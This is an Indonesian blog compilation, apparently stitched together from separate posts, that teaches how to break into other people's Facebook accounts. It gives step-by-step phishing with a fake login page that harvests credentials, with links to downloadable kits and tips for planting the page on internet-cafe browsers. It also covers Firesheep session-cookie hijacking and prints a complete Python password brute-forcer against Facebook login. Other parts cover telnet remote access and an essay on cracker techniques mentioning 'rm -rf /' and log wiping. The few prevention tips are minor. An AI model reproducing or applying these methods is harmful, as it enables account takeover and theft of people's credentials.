Information&Communication Technology

Berikut adalah kumpulan lengkap cara hack facebook, cara hack facebook orang lain, cara hack facebook, cara hack fb, cara hack password facebook, cara hack fb 2011, cara hack facebook orang, cara hack facebook 2011, cara hack fb orang lain, cara hack fb terbaru, cara hack fb 2011, cara hack fb orang, cara hack akun fb, cara hack akun fb orang lain, cara hack akun facebook terbaru, cara hack akun facebook 2011, cara hack password fb, cara hack account fb, cara hack account facebook, cara hack account facebook 2011, cara hack account facebook terbaru, cara hack facebook teman, cara hack facebook pacar, cara hack fb teman, cara hack fb pacar, crack facebook, cara crack fb, cara menjebol fb, cara menjebol akun, fb, cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook, tutorial hack fb, tutorial hacking fb, tutorial hacking account fb, tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook, tutorial hack password facebook, tutorial crack facebook.

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

PERTAMA:

Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.

KEDUA:

Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.

Sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.

1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp

2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2…

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

preview:

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini

kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . ..

KETIGA:

Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,

1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini

Password : Flow

dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.

nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.

pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.

sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.

saran bagi facebook’er :

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.

Disana terdapat tulisan "Could not open connection to the host, on port 23:" yang artinya belum berhasil terkoneksi dengan komputer tujuan. Lalu langkah-langkah apa lagi kah yang kurang?

1. Service telnet belum aktif, untuk mengaktifkannya buka Control Panel >> Administrative Tools >> Services, dalam sekejap akan terbuka jendela "service" dan untuk mengaktifkan "service telnet" anda hanya mencari service dengan nama telnet lalu double klik hingga terbuka jendela "Telnet Properties (local computer)", perhatikan tulisan "Startup type" pilih Automatic dan "Service status" dalam keadaan aktif dengan cara klik tombol "Start". Jika semuanya sukses langsung saja klik "OK"

2. port 23 belum terbuka di komputer tujuan, yuk kita buka..!!! Caranya buka Control Panel >> Security Center, jika sudah muncul jendela "Windows Security Center" perhatikan tulisan "Manage security setting for:" lalu klik "Windows Firewall", penjelasannya seperti gambar dibawah ini:


Setelah muncul jendela "Windows Firewall" lalu klik tombol "Add Port" yang mengharuskan anda untuk mengisi "Name" dan "Port Number". Isi "Name" dengan tulisan telnet atau apa saja yang pasti anda mengingatnya dan isi "Port Number" yang akan dibuka, disini kita akan membuka port 23 lalu klik "Ok", setelah semuanya selesai maka nama port yang telah kita buat akan terdaftar di jendela "Windows Firewall" dan yang pasti harus dalam kedaan aktif.

Pada tahap selanjutnya kita akan melakukan percobaan lagi dengan mengkoneksikan telnet dengan komputer tujuan. yaps langsung saja ketik telnet 192.168.1.20 23 pada CMD. Maka hasilnya seperti gambar dibawah ini.


Pilih saja "n" yang berarti no (tidak). Akhirnya kita telah berhasil dan aplikasi telnet meminta kita untuk login ke komputer tujuan.


Diharuskan komputer tujuan mempunyai "User Account" beserta passwordnya untuk mengisi login seperti pada tampilan diatas.


Jika telnet sudah berhasil terkoneksi maka tampilannya seperti gambar diatas. Selanjutnya anda akan bermain-main dengan perintah dos untuk copy, delete, run program, dll. Sebagian komputer akan mengalami kendala, dalam artian gagal koneksi setelah login seperti yang baru saja dijelaskan, tampilannya seperti gambar dibawah ini.


Ini dikarenakan komputer yang akan kita remote memiliki lebih dari satu "User Account", agar dapat terkoneksi dengan baik maka ada beberapa langkah lagi yang harus anda lakukan. buka Control Panel >> Administrative Tools >> Local Security Policy, setelah menampilkan jendela Local Security Policy perhatikan pada bagian Security Settings >> Local Policies >> Security Options, lalu cari tulisan "Network access: Sharing anda security model for local accounts" double klik atau klik kanan pilih properties lalu ubah settingan menjadi "Clasic only - local user authenticate as guest" selanjutnya klik "Ok" lalu ulangi langkah-langkah diatas dan berhasil.

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di :
http://www.sans.org
http://www.rootshell.com
http://www.linuxfirewall.org/
http://www.linuxdoc.org
http://www.cerias.purdue.edu/coast/firewalls/
http://www.redhat.com/mirrors/LDP/HOWTO/

Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di :
http://www.iss.net/vd/mail.html
http://www.v-one.com/documents/fw-faq.htm

Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di :
http://bastille-linux.sourceforge.net/
http://www.redhat.com/support/docs/tips/firewall/firewallservice.html

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari :
http://pandu.dhs.org
http://www.bogor.net/idkf/
http://louis.idaman.com/idkf

Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/ . Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk . Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

PERTAMA:

Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.

KEDUA:

Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.

cara menggunakanya sebagai berikut:

1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.

nah gimana cara mencegah pencurian password dengan firesheep ini?

kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/

KETIGA:

Bismillah,

pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:

Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:

1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.

Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.

Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?

langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:

1. pertama-tama buka aplikasi wireshark
2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
4. pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
   host www.facebook.com and host alamat.ip.komputer.anda
5. Klik start, maka proses penyadapan akan segera dimulai
6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:

   

8. hasil statistik sniffing paket data facebook

Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.

sekian postingan kali ini.

PERTAMA:

Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.

KEDUA:

Silakan download FbBruteforce:

Berikut Codenya:


#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me

import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...

Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help

Example : %s -u brad@hackme.com -w wordlist.txt"

P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]

def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)

def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)

for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()

def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)

def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))

def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()

if __name__ == '__main__':
main()


Nah, dari beberapa cara hack facebook dan pencegahannya di atas semoga anda lebih berhati-hati, untuk lebih detail mengenai tiap metode atau cara yang saya sebutkan di atas akan saya bahas di postingan saya yang selanjutnya, semoga bermanfaat dan semoga akun facebook anda tidak kena hack

